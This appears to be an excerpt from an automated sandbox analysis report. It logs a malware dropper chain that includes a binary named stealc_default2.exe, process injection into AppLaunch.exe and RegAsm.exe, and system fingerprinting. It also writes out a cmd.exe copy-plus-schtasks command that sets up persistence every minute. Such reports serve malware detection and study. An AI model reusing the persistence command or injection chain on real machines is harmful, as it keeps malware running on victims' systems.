Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 401000
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 452000
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 464000
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46B000
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46C000
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 48DA008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe "C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\1.exe "C:\Users\user\AppData\Local\Temp\1000191001\1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe "C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000241001\build.exe "C:\Users\user\AppData\Local\Temp\1000241001\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe "C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe "C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe "C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c copy "c:\users\user\appdata\local\temp\1000243001\runtime.exe" "c:\users\user\pictures\lighter tech\runtime.exe" && schtasks /create /sc minute /mo 1 /tn "runtime" /tr "c:\users\user\pictures\lighter tech\runtime.exe" /f
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c copy "c:\users\user\appdata\local\temp\1000243001\runtime.exe" "c:\users\user\pictures\lighter tech\runtime.exe" && schtasks /create /sc minute /mo 1 /tn "runtime" /tr "c:\users\user\pictures\lighter tech\runtime.exe" /f

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 22_2_6CA84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

22_2_6CA84760

Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000033DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: axplong.exe, axplong.exe, 00000007.00000002.2747436808.00000000003AB000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: <Program Manager
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000033DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_001CD312 cpuid

7_2_001CD312

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_0041E815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	14_2_00414128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	14_2_0041EA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_0041EB91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	14_2_0041E402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	14_2_0041EC97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_0041ED66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	14_2_0041E5FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	14_2_0041464E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	14_2_0041E6EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	14_2_0041E6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	14_2_0041E78A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	22_2_009F7630

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\1000238002\Amadeus.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\1000238002\Amadeus.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000241001\build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000241001\build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Queries volume information: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000241001\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
